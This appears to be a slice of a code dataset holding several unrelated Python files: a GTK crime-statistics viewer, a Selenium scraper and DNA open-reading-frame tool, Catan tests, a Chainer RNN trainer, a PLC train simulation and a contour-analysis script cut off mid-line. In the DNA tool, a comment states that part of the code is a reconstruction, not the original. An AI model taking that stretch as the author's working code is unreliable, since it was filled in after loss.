@self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == 
@self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\tself.button_show_graph.set_sensitive(True)\t\n\t\telse:\n\t\t\tself.button_show_graph.set_sensitive(False)\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\t\t\t\n\t\treturn\n\n\tdef on_changed_crime(self, widget):\n\t\tif(self.combobox_year.get_active_text() != 'All'):\t\t\n\t\t\tintyear = int(self.combobox_year.get_active_text())\n\n\t\t# Check crime field\n\t\tif \" \" not in self.combobox_crime.get_active_text():\n\t\t\tcrime = self.combobox_crime.get_active_text()\n\t\telse:\n\t\t\tcrime = \".\".join(self.combobox_crime.get_active_text().split(\" \"))\n\n\t\tif(self.combobox_district.get_active_text() == 'All' and self.combobox_year.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\telif(self.combobox_district.get_active_text() == 'All'):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\telif (self.combobox_year.get_active_text() == \"All\"):\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text()').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\t\n\t\telse:\n\t\t\tself.filtered_data = self.data.query('STATEorUT == @self.combobox_state.get_active_text() and DISTRICT == @self.combobox_district.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT','DISTRICT','YEAR', crime])\n\t\treturn\n\n\tdef compare_states(self, widget):\n\t\tcrimes = [\"MURDER\", \"RAPE\", \"KIDNAPPING.ABDUCTION\", \"RIOTS\", \"ROBBERY\", \"BURGLARY\", \"DOWRY.DEATHS\"]\n\t\tintyear = int(self.combobox_yearc.get_active_text()) \n\t\tstate1_data = self.data.query('STATEorUT == @self.combobox_state1.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT', 'DISTRICT', 'YEAR', crimes[0], crimes[1],crimes[2],crimes[3],crimes[4],crimes[5],crimes[6]])[self.data.DISTRICT == 'TOTAL']\n\t\tstate2_data = self.data.query('STATEorUT == @self.combobox_state2.get_active_text() and YEAR == @intyear').filter(items=['STATEorUT', 'DISTRICT', 'YEAR', crimes[0], crimes[1],crimes[2],crimes[3],crimes[4],crimes[5],crimes[6]])[self.data.DISTRICT == 'TOTAL']\n\t\tprint(state1_data.iloc[0]['MURDER'])\n\n\t\tstate1_total = [state1_data.iloc[0][crimes[0]],state1_data.iloc[0][crimes[1]],state1_data.iloc[0][crimes[2]],state1_data.iloc[0][crimes[3]],state1_data.iloc[0][crimes[4]],state1_data.iloc[0][crimes[5]],state1_data.iloc[0][crimes[6]]]\n\t\tstate2_total = [state2_data.iloc[0][crimes[0]],state2_data.iloc[0][crimes[1]],state2_data.iloc[0][crimes[2]],state2_data.iloc[0][crimes[3]],state2_data.iloc[0][crimes[4]],state2_data.iloc[0][crimes[5]],state2_data.iloc[0][crimes[6]]]\n\t\tprint(state1_total)\n\n\t\tdialog = gtk.Dialog(\"My dialog\",\n\t\tself,\n\t\tgtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,\n\t\t(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))\n\t\tfig = Figure(figsize=(5, 4), dpi=100)\n\t\tdialog.set_size_request(1300,500)\n\t\tax = fig.add_subplot(111)\n\t\typos = np.arange(len(crimes))\n\t\tprint(ypos)\n\t\tp1 = 
ax.bar(ypos-0.4, state1_total, width=0.4, color='r', align='center')\n\t\tp2 = ax.bar(ypos, state2_total, width=0.4, color='b', align='center')\n\n\t\tax.set_title(\"Comparison of \" + self.combobox_state1.get_active_text() + \" and \" + self.combobox_state2.get_active_text())\n\t\tax.set_xticks(ypos-0.2)\n\t\tax.set_xticklabels(crimes)\n\t\tax.set_ylabel('Total Crimes')\n\t\tax.legend((p1[0], p2[0]), (self.combobox_state1.get_active_text(), self.combobox_state2.get_active_text()))\n\n\t\tcanvas = FigureCanvas(fig) # a gtk.DrawingArea\n\t\tcanvas.set_size_request(800, 600)\n\t\tdialog.vbox.pack_start(canvas)\n\t\ttoolbar = NavigationToolbar(canvas, dialog)\n\t\tdialog.vbox.pack_start(toolbar, False, False)\n\t\tcanvas.show()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\t\t\n\t\treturn\t\t\n\nPyApp()\ngtk.main()\n\n","sub_path":"ics3.py","file_name":"ics3.py","file_ext":"py","file_size_in_byte":20791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"548653523","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport re\nimport sys\n\ndef login(driver):\n print('Logging in')\n driver.get('https://clims4.genewiz.com/RegisterAccount/Login')\n fill_box = driver.find_element_by_xpath('//*[@id=\"LoginName\"]')\n fill_box.clear()\n fill_box.send_keys('******')\n fill_box = driver.find_element_by_xpath('//*[@id=\"Password\"]')\n fill_box.send_keys('*****')\n driver.find_element_by_xpath('//*[@id=\"btnSubmit\"]').click()\n\ndef sample_search(driver):\n global sample_status\n table = driver.find_element_by_xpath('//*[@id=\"myOrdersTable\"]/tbody')\n try:\n for i,td in enumerate(table.find_elements_by_xpath('//*[@id=\"myOrdersTable\"]/tbody/tr/td[4]'),1):\n if td.text == '':\n continue\n number_search=re.match('^\\d+-',td.text)\n if number_search == None:\n number_value=''\n else:\n number_value=number_search.group(0)\n if td.text == (number_value+user_input):\n number_of_samples=driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[9]')\n sample_status=driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[11]/button')\n driver.find_element_by_xpath(f'//*[@id=\"myOrdersTable\"]/tbody/tr[{i}]/td[11]/button').click()\n break\n print(f'\\n{number_of_samples.text} samples detected\\n')\n print(f'\\nEstimated time of completion {int(number_of_samples.text)*2} seconds')\n flag=True\n except:\n flag=False\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH,'//*[@id=\"myOrdersTable_paginate\"]/ul/li[8]/a'))).click()\n return flag\n\n\nsample_status=()\nuser_input=sys.argv[1]\ndef get_sequence():\n global sample_status\n start_time = time.time()\n print('Starting Program')\n options = Options()\n options.add_argument(\"--window-size=1920,1080\")\n options.add_argument(\"--start-maximized\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument('--disable-extensions')\n options.add_argument('--no-sandbox')\n options.add_argument(\"--headless\")\n options.add_argument('log-level=3')\n options.add_argument('--proxy-server=\"direct://\"')\n options.add_argument('--proxy-bypass-list=*')\n driver = webdriver.Chrome(options=options)\n login(driver)\n WebDriverWait(driver, 
10).until(EC.element_to_be_clickable((By.XPATH,'//*[@id=\"hs-eu-confirmation-button\"]'))).click()\n    print('\\nCompiling Sequences\\n')\n    page=0\n    while sample_search(driver) is False:\n        page+=1\n        print(f'Checking Page {page}')\n        if page>50:\n            print('Sequence ID does not exist')\n            print('Ending Program')\n            sample_status='Error'\n            return\n    if sample_status.text != 'View Results':\n        print('\\nSample is not finished sequencing yet\\n')\n        return\n    WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, '//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody')))\n    seq_list=[]\n    table=driver.find_element_by_xpath('//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody')\n    for x,sequence in enumerate(table.find_elements_by_xpath('//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody/tr/td[9]'),1):\n        WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, f'//*[@id=\"gwzSngrOrderResultPanelRoot\"]/table/tbody//tr[{x}]/td[9]/span[2]'))).click()\n        seq_list.append([(WebDriverWait(driver, 20).until(EC.visibility_of_element_located((By.XPATH, \"//*[@id='gwzViewResultsModalDialog']/div/div/div[2]/div\"))).text)])\n        WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"gwzViewResultsModalDialog\"]/div/div/div[3]/button'))).click()\n    #print(time.time() - start_time)\n    driver.close()\n    return seq_list\n\n\ndna_codon_dict={'TTT':'F','TTC':'F',\n                'TTA':'L','TTG':'L',\n                'CTT':'L','CTC':'L',\n                'CTA':'L','CTG':'L',\n                'ATT':'I','ATC':'I',\n                'ATA':'I','ATG':'M',\n                'GTT':'V','GTC':'V',\n                'GTA':'V','GTG':'V',\n                'TCT':'S','TCC':'S',\n                'TCA':'S','TCG':'S',\n                'CCT':'P','CCC':'P',\n                'CCA':'P','CCG':'P',\n                'ACT':'T','ACC':'T',\n                'ACA':'T','ACG':'T',\n                'GCT':'A','GCC':'A',\n                'GCA':'A','GCG':'A',\n                'TAT':'Y','TAC':'Y',\n                'CAT':'H','CAC':'H',\n                'CAA':'Q','CAG':'Q',\n                'AAT':'N','AAC':'N',\n                'AAA':'K','AAG':'K',\n                'GAT':'D','GAC':'D',\n                'GAA':'E','GAG':'E',\n                'TGT':'C','TGC':'C',\n                'TGG':'W','CGT':'R',\n                'CGC':'R','CGA':'R',\n                'CGG':'R','AGT':'S',\n                'AGC':'S','AGA':'R',\n                'AGG':'R','GGT':'G',\n                'GGC':'G','GGA':'G',\n                'GGG':'G','TAA':'X',\n                'TAG':'X','TGA':'X'}\n\nDNA_complement_dict={'A':'T',\n                     'T':'A',\n                     'G':'C',\n                     'C':'G',\n                     'N':'N'}\n\ndef rev(global_codon_list):\n    return [DNA_complement_dict[codons] for codons in reversed(global_codon_list)]\n\n\ndef codon_translation(global_codon_list):\n    # Translates the nucleotide string in all three forward reading frames.\n    # NOTE: the middle of this function and the header of\n    # find_open_reading_frames were lost in extraction; the bodies below are a\n    # hedged reconstruction modelled on find_open_reading_frames_auto_mode\n    # further down, not the author's original lines.\n    codon_triple_list=[]\n    open_reading_frame_lists=[[],[],[]]\n    for i,_ in enumerate(open_reading_frame_lists,1):\n        codon_triple_list.clear()\n        open_reading_frame_count=1\n        for base in global_codon_list:\n            if open_reading_frame_count >= i:\n                codon_triple_list.append(base)\n                if len(codon_triple_list) == 3:\n                    # Unknown triples (e.g. containing 'N') are skipped.\n                    amino_acid = dna_codon_dict.get(''.join(codon_triple_list))\n                    if amino_acid is not None:\n                        open_reading_frame_lists[i-1].append(amino_acid)\n                    codon_triple_list.clear()\n            open_reading_frame_count += 1\n    return open_reading_frame_lists\n\n\ndef find_open_reading_frames(global_codon_list):\n    # Manual-mode ORF finder: collects translated stretches running from an\n    # 'M' (start) to an 'X' (stop) that are longer than 20 residues. Mirrors\n    # find_open_reading_frames_auto_mode, which uses protein_size instead of\n    # the hard-coded 20.\n    sequences_to_search=[]\n    sequence_to_add_to_search_list=[]\n    add_to_string=False\n    for open_reading_frames in codon_translation(global_codon_list):\n        for amino_acids in open_reading_frames:\n            if amino_acids == 'M':\n                add_to_string=True\n            if add_to_string:\n                sequence_to_add_to_search_list.append(amino_acids)\n            if amino_acids == 'X':\n                add_to_string=False\n                if len(sequence_to_add_to_search_list)>20:\n                    sequences_to_search.append(''.join(sequence_to_add_to_search_list))\n                    sequence_to_add_to_search_list.clear()\n                else:\n                    sequence_to_add_to_search_list.clear()\n    return sequences_to_search\n\n\nglobal_codon_list=[]\nsequence_list1=[]\ndef manual_mode():\n    global global_codon_list\n    global sequence_list1\n    sample_statues_check=get_sequence()\n    if sample_status == 'Error':\n        return\n    if sample_statues_check is None:\n        print('\\nEnding program\\n')\n        return\n    for i,sequence in enumerate(sample_statues_check):\n        title=re.search(r'^>.*\\n',sequence[0])\n        remove_title=re.sub(r'^>.*\\n','',sequence[0])\n        global_codon_list=re.sub(r'\\n','',remove_title)\n        sequences_to_search=find_open_reading_frames(global_codon_list)\n        sequence_to_search=[]\n        print(f'\\nsample {title.group(0)}')\n        for number,sequences in enumerate(sequences_to_search,1):\n            print(f'row {number} sequence: {sequences}')\n            sequence_to_search.append(sequences)\n        
pick_sequence_to_search=input('indicate which row # sequence to search, if no match, type \"n\": ')\n if pick_sequence_to_search != 'n':\n sequence_list1.append(sequence_to_search[int(pick_sequence_to_search)-1])\n questionairre_question=input('would you like to search BLAST and or save your sequence and translated protein? (y/n): ')\n if questionairre_question != 'n':\n questionairre(title)\n else:\n reverse_loop(title)\n if sequence_list1 != []:\n questionairre_question=input('would you like to search BLAST and or save your sequence and translated protein? (y/n): ')\n if questionairre_question != 'n':\n questionairre(title)\n\ndef questionairre(title):\n BLAST_question=input('Would you like to run sequence against BLAST? (y/n): ')\n if BLAST_question != 'n':\n BLAST()\n dna_save_file_question=input('Would you like to save your DNA file?\\n If yes, please type in the desired filename, else type \"n\": ')\n if dna_save_file_question != 'n':\n with open(dna_save_file_question,'w') as dna_file:\n dna_file.write(title.group(0)+global_codon_list)\n protein_save_file_question=input('Would you like to save your translated protein sequence?\\nIf yes, please type in the desired filename, else type \"n\": ')\n if protein_save_file_question !='n':\n with open(protein_save_file_question,'w') as protein_file:\n protein_file.write(title.group(0)+'\\n'+(''.join(sequence_list1)))\n expasy_question=input('Would you like to generate an expasy file for your protein? (y/n): ')\n if expasy_question != 'n':\n expasy()\n\n\ndef reverse_loop(title):\n global global_codon_list\n global sequence_list1\n\n global_codon_list=rev(global_codon_list)\n sequences_to_search=find_open_reading_frames(global_codon_list)\n sequence_to_search=[]\n print(f'sample {title.group(0)}')\n for number,sequence in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequence}')\n sequence_to_search.append(sequence)\n pick_sequence_to_search=input('indicate which row # sequence to search, if no match, type \"n\": ')\n if pick_sequence_to_search != 'n':\n sequence_list1.append(sequence_to_search[int(pick_sequence_to_search)-1])\n else:\n print('\\nYour protein was not found in Sequencing\\n')\n sequence_list1.clear()\n\n\ndef BLAST():\n driver = webdriver.Chrome()\n driver.get('https://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastp&PAGE_TYPE=BlastSearch&LINK_LOC=blasthome')\n fill_box = driver.find_element_by_xpath('/html/body/div[2]/div/div[2]/form/div[3]/fieldset/div[1]/div[1]/textarea')\n fill_box.clear()\n fill_box.send_keys(''.join(sequence_list1))\n sumbit_button=driver.find_element_by_xpath('/html/body/div[2]/div/div[2]/form/div[6]/div/div[1]/div[1]/input')\n sumbit_button.click()\n while True:\n try:\n tmp = driver.title\n except:\n break\ndef expasy():\n driver = webdriver.Chrome()\n driver.get('https://web.expasy.org/protparam/')\n fill_box = driver.find_element_by_xpath('/html/body/div[2]/div[2]/form/textarea')\n fill_box.clear()\n fill_box.send_keys(''.join(sequence_list1))\n sumbit_button=driver.find_element_by_xpath('/html/body/div[2]/div[2]/form/p[1]/input[2]')\n sumbit_button.click()\n while True:\n try:\n tmp = driver.title\n except:\n print('program done')\n break\n\nprotein_size=100\ndef find_open_reading_frames_auto_mode(global_codon_list):\n sequences_to_search=[]\n sequence_to_add_to_search_list=[]\n add_to_string=False\n for open_reading_frames in codon_translation(global_codon_list):\n for amino_acids in open_reading_frames:\n if amino_acids == 'M':\n add_to_string=True\n if add_to_string is 
True:\n sequence_to_add_to_search_list.append(amino_acids)\n if amino_acids == 'X':\n add_to_string=False\n if len(sequence_to_add_to_search_list)>protein_size:\n sequences_to_search.append(''.join(sequence_to_add_to_search_list))\n sequence_to_add_to_search_list.clear()\n else:\n sequence_to_add_to_search_list.clear()\n return sequences_to_search\n\ndef reverse_loop_auto(title):\n global global_codon_list\n global sequence_list1\n\n global_codon_list=rev(global_codon_list)\n sequences_to_search=find_open_reading_frames_auto_mode(global_codon_list)\n sequence_to_search=[]\n print(f'sample {title.group(0)}')\n for number,sequence in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequence}')\n sequence_to_search.append(sequence)\n if sequence_to_search == []:\n print(f'{title.group(0)} not found')\n\ndef auto_mode():\n global global_codon_list\n global sequence_list1\n sample_statues_check=get_sequence()\n if sample_status == 'Error':\n return\n if sample_statues_check == None:\n print('\\nEnding program\\n')\n return\n for i,sequence in enumerate(sample_statues_check):\n title=re.search(r'^>.*\\n',sequence[0])\n remove_title=re.sub(r'^>.*\\n','',sequence[0])\n global_codon_list=re.sub(r'\\n','',remove_title)\n sequences_to_search=find_open_reading_frames_auto_mode(global_codon_list)\n sequence_to_search=[]\n print(f'\\nsample {title.group(0)}')\n for number,sequences in enumerate(sequences_to_search,1):\n print(f'row {number} sequence: {sequences}')\n sequence_to_search.append(sequences)\n if sequences_to_search == []:\n print('\\nno forward sequence found, checking reverse sequence\\n')\n reverse_loop_auto(title)\n\ndef main_loop():\n auto_or_manual_question=input('would you like auto-mode, or manual mode? (type auto for auto-mode, manual for maual mode): ')\n if auto_or_manual_question == 'auto':\n auto_mode()\n else:\n manual_mode()\n\n\nmain_loop()\n","sub_path":"DTB_V2.py","file_name":"DTB_V2.py","file_ext":"py","file_size_in_byte":14127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"626485891","text":"from catan_core.building.settlement import Settlement\nfrom catan_core.edge import Edge\nfrom catan_core.player.player import Player\nfrom catan_core.road import Road\nfrom catan_core.vertex import Vertex\n\n\nclass TestEdge:\n def test_init_no_vertices(self):\n edge = Edge(id=0)\n assert edge.id == 0\n assert edge.vertices == []\n\n def test_repr(self):\n assert Edge(id=0).__repr__() == \"edge-0\"\n\n def test_set_vertices(self):\n edge = Edge(id=0)\n vertex = Vertex(id=0)\n\n edge.vertices = [vertex]\n\n assert edge.vertices == [vertex]\n\n def test_assign_road(self):\n player = Player()\n edge = Edge(id=0)\n assert not edge.road\n road = Road(player=player)\n edge.assign_road(road=road)\n assert edge.road == road\n\n def test_can_place_road_returns_false_if_road_already_exists(self):\n edge = Edge(id=0)\n player = Player()\n edge.road = Road(player=player)\n assert not edge.can_place_road(player=player)\n\n def test_can_place_road_returns_false_if_no_adjacent_roads_for_player(\n self,\n ):\n player1 = Player()\n player2 = Player()\n\n edge = Edge(id=0)\n edge_no_road = Edge(id=1)\n edge_with_road_player2 = Edge(id=2)\n edge_with_road_player2.road = Road(player=player2)\n\n v1 = Vertex(id=0)\n v2 = Vertex(id=1)\n\n # Connect vertex to edges\n edge.vertices = [v1, v2]\n edge_no_road.vertices = [v1]\n edge_with_road_player2.vertices = [v2]\n v1.edges = [edge, edge_no_road]\n v2.edges = [edge, 
edge_with_road_player2]\n\n assert not edge.can_place_road(player=player1)\n\n def test_can_place_road_retruns_true_if_adjacent_building_for_player(self):\n player = Player()\n\n edge = Edge(id=0)\n vertex = Vertex(id=0)\n\n edge.vertices = [vertex]\n vertex.edges = [edge]\n vertex.assign_building(building=Settlement(player=player))\n\n assert edge.can_place_road(player=player)\n\n def test_can_place_road_returns_true_if_adjacent_road_for_player(self):\n player = Player()\n\n edge = Edge(id=0)\n edge_with_road = Edge(id=1)\n edge_with_road.road = Road(player=player)\n\n vertex = Vertex(id=0)\n\n # Connect vertex to edges\n edge.vertices = [vertex]\n edge_with_road.vertices = [vertex]\n vertex.edges = [edge, edge_with_road]\n\n assert edge.can_place_road(player=player)\n","sub_path":"catan_core/test/test_edge.py","file_name":"test_edge.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277561532","text":"import numpy as np\nimport chainer\nfrom chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils\nfrom chainer import Link, Chain, ChainList\nimport chainer.functions as F\nimport chainer.links as L\n\nfrom impls import rnn, helpers\n\nname = helpers.get_script_name(__file__)\ndata_path = '.data/ptb.train.min.txt'\ndest_root = '.dest'\n\nvocab = {}\ntrain_data = helpers.load_data(data_path, vocab)\n\neos_id = vocab['']\ndemb = 100\nmodel = rnn.Rnn(len(vocab), eos_id, demb)\noptimizer = optimizers.Adam()\noptimizer.setup(model)\n\nfor epoch in range(5):\n s = []\n for pos in range(len(train_data)):\n id = train_data[pos]\n s.append(id)\n if id == eos_id:\n model.zerograds()\n loss = model(s)\n loss.backward()\n optimizer.update()\n s = []\n outfile = \"{0}/rnn-{1}.model\".format(dest_root, epoch)\n serializers.save_npz(outfile, model)\n","sub_path":"try-chainer/chapter07/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30608012","text":"# ====== Legal notices\r\n#\r\n# Copyright (C) 2013 GEATEC engineering\r\n#\r\n# This program is free software.\r\n# You can use, redistribute and/or modify it, but only under the terms stated in the QQuickLicence.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY, without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n# See the QQuickLicence for details.\r\n#\r\n# The QQuickLicense can be accessed at: http://www.geatec.com/qqLicence.html\r\n#\r\n# __________________________________________________________________________\r\n#\r\n#\r\n# THIS PROGRAM IS FUNDAMENTALLY UNSUITABLE FOR CONTROLLING REAL SYSTEMS !!\r\n#\r\n# __________________________________________________________________________\r\n#\r\n# It is meant for training purposes only.\r\n#\r\n# Removing this header ends your licence.\r\n#\r\n\r\nimport simpylc as sp\r\n\r\nclass Control (sp.Module):\r\n def __init__ (self):\r\n sp.Module.__init__ (self)\r\n \r\n self.page ('train control')\r\n\r\n self.group ('control buttons', True)\r\n self.brakeLiftButton = sp.Marker ()\r\n self.driveEnableButton = sp.Marker ()\r\n\r\n self.group ('warning lamps')\r\n self.brakeWarnLamp = sp.Marker ()\r\n self.speedWarnLamp = sp.Marker ()\r\n\r\n self.group ('state')\r\n self.accel = sp.Register ()\r\n self.speed = sp.Register ()\r\n self.position = sp.Register 
()\r\n\r\n self.group ('auxiliary', True)\r\n self.maxSpeed = sp.Register ()\r\n self.speedWarnFraction = sp.Register (0.8)\r\n self.oldSpeed = sp.Register ()\r\n self.blinkTime = sp.Register (0.5)\r\n self.blinkTimer = sp.Timer ()\r\n self.blinkEdge = sp.Oneshot ()\r\n self.blinkOn = sp.Marker ()\r\n\r\n self.group ('sweep time measurement')\r\n self.sweepMin = sp.Register (sp.finity)\r\n self.sweepMax = sp.Register ()\r\n self.watchTime = sp.Register (2)\r\n self.watchTimer = sp.Timer ()\r\n self.run = sp.Runner ()\r\n\r\n def input (self):\r\n self.part ('speed')\r\n self.speed.set (sp.world.physics.speed)\r\n self.maxSpeed.set (sp.world.physics.maxSpeed)\r\n\r\n self.part ('position')\r\n self.position.set (sp.world.physics.position)\r\n\r\n def sweep (self):\r\n self.part ('dynamics')\r\n self.accel.set ((self.speed - self.oldSpeed) / sp.world.period)\r\n self.oldSpeed.set (self.speed)\r\n\r\n self.part ('warnings')\r\n self.blinkTimer.reset (self.blinkTimer > self.blinkTime)\r\n self.blinkEdge.trigger (not self.blinkTimer)\r\n self.blinkOn.mark (not self.blinkOn, self.blinkEdge)\r\n self.brakeWarnLamp.mark (not self.brakeLiftButton and self.driveEnableButton and self.blinkOn)\r\n self.speedWarnLamp.mark (self.speed > self.speedWarnFraction * self.maxSpeed and self.blinkOn)\r\n \r\n self.part ('sweep time masurement')\r\n self.sweepMin.set (sp.world.period, sp.world.period < self.sweepMin)\r\n self.sweepMax.set (sp.world.period, sp.world.period > self.sweepMax)\r\n self.watchTimer.reset (self.watchTimer > self.watchTime)\r\n self.sweepMin.set (sp.finity, not self.watchTimer)\r\n self.sweepMax.set (0, not self.watchTimer)\r\n \r\n def output (self):\r\n self.part ('control signals')\r\n sp.world.physics.brakeLift.mark (self.brakeLiftButton)\r\n sp.world.physics.driveEnable.mark (self.driveEnableButton)\r\n \r\n","sub_path":"module_plc_besturingen/les_2_van_simulatie_naar_on_site_debugging/progs/train/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598320110","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom palettable.colorbrewer.qualitative import Paired_9 as mycorder\r\nfrom shapely.geometry import LineString, Point, MultiPoint\r\nimport warnings\r\nfrom viroconcom.contours import Contour\r\nfrom viroconcom.read_write import read_ecbenchmark_dataset, read_contour\r\nfrom viroconcom.plot import plot_contour, plot_confidence_interval\r\n\r\ndataset_char = 'D'\r\nreturn_period = 50\r\n\r\nlastname_firstname = [\r\n 'Wei_Bernt',\r\n 'GC_CGS',\r\n 'hannesdottir_asta',\r\n 'haselsteiner_andreas',\r\n 'BV',\r\n 'mackay_ed',\r\n 'qiao_chi',\r\n 'rode_anna',\r\n 'vanem_DirectSampling',\r\n]\r\nn_contours_to_analyze = len(lastname_firstname)\r\n\r\nclass Object(object):\r\n pass\r\n\r\n\r\n# Code from https://github.com/ahaselsteiner/2020-paper-omae-hierarchical-models/blob/master/contour_intersection.py\r\ndef contour_intersection(contour_x, contour_y, line_x, line_y, do_plot_in_case_of_failure=False):\r\n \"\"\"\r\n Computes the intersection point between two lines.\r\n The first line should be the environmental contour and the second line a\r\n straight line. 
If there are more multiple intersections the point that has\r\n the longest distance to the origin is returned (assuming the origin is at\r\n the first point of the straight line).\r\n Parameters\r\n ----------\r\n contour_x : ndarray of floats,\r\n Coordinates in the first dimension of the contour.\r\n contour_y : ndarray of floats\r\n Coordinates in the second dimension of the contour.\r\n line_x : ndarray of floats\r\n Coordinates in the first dimension of the straight line.\r\n line_y : ndarray of floats\r\n Coordaintes in the second dimension of the straight line.\r\n do_plot_in_case_of_failure : Boolean,\r\n if True a plot of the two lines for which no intersection could be\r\n found is shown.\r\n Returns\r\n -------\r\n x : float\r\n Intersection coordinate in the first dimension.\r\n y : float\r\n Intersection coordinate in the second dimension.\r\n \"\"\"\r\n\r\n point_list_l1 = list()\r\n for x,y in zip(contour_x, contour_y):\r\n point = Point(x, y)\r\n point_list_l1.append(point)\r\n contour = LineString(point_list_l1)\r\n\r\n point_list_l2 = list()\r\n for x,y in zip(line_x, line_y):\r\n point = Point(x, y)\r\n point_list_l2.append(point)\r\n line2 = LineString(point_list_l2)\r\n\r\n intersection = contour.intersection(line2)\r\n if type(intersection) is Point:\r\n return intersection.x, intersection.y\r\n if type(intersection) is MultiPoint:\r\n if len(intersection.geoms) > 0:\r\n print(str(len(intersection.geoms)) + ' intersections were found.'\r\n + ' Using the intersection that is the farthest'\r\n + ' away from the origin.')\r\n origin = Point(line_x[0], line_y[0])\r\n for i, p in enumerate(intersection.geoms):\r\n if i == 0:\r\n inter_x = p.x\r\n inter_y = p.y\r\n longest_distance = origin.distance(p)\r\n else:\r\n if origin.distance(p) > longest_distance:\r\n inter_x = p.x\r\n inter_y = p.y\r\n return inter_x, inter_y\r\n else:\r\n print('The result is: ' + str(intersection))\r\n warnings.warn('No point of intersection could be found. '\r\n 'Returning (nan, nan).', UserWarning)\r\n if do_plot_in_case_of_failure:\r\n fig = plt.figure(figsize=(5, 5), dpi=150)\r\n fig.add_subplot(111)\r\n plt.plot(contour_x, contour_y, 'b-')\r\n plt.plot(line_x, line_y, 'r-')\r\n plt.show()\r\n return np.nan, np.nan\r\n\r\n# Code from: https://github.com/ahaselsteiner/2020-paper-omae-hierarchical-models/blob/master/contour_statistics.py#L44\r\ndef thetastar_to_theta(thetastar, xspread, yspread):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n thetastar : ndarray of floats\r\n Angle in the normalized coordinate system.\r\n xspread : float\r\n Spread of x (xmax - ymin).\r\n yspread : float\r\n Spread of y (ymax - amin).\r\n Returns\r\n -------\r\n theta : float,\r\n The angle theta in the original coordinate system. 
The angle is\r\n defined counter clockwise, 0 at (x=1, y=0) and is converted to be\r\n inside the interval [0 360).\r\n \"\"\"\r\n theta = np.arctan2(np.sin(thetastar) * yspread, np.cos(thetastar) * xspread)\r\n for i, t in enumerate(theta):\r\n if t < 0:\r\n theta[i] = t + 2 * np.pi\r\n return theta\r\n\r\ncolors_for_contribution = mycorder.mpl_colors\r\nfor idx in range(2):\r\n colors_for_contribution.append(colors_for_contribution[8])\r\ncolors_for_contribution.append('blue')\r\n\r\n\r\nfig, axs = plt.subplots(1, 2, sharey=True, figsize=(8, 4))\r\nmax_hs_of_sample = 0\r\n\r\n# Load the environmental data.\r\nfile_name_provided = 'datasets/' + dataset_char + '.txt'\r\nv_p, hs_p, label_v, label_hs = read_ecbenchmark_dataset(file_name_provided)\r\nmax_hs_of_sample = max([max_hs_of_sample, max(hs_p)])\r\n\r\ncontours = []\r\ncontours_v = []\r\ncontours_hs = []\r\nmax_hs_on_contours = np.empty(n_contours_to_analyze)\r\nfor i in range(n_contours_to_analyze):\r\n contribution_nr = i + 1\r\n if 11 >= contribution_nr >= 9:\r\n contribution_nr = 9\r\n elif 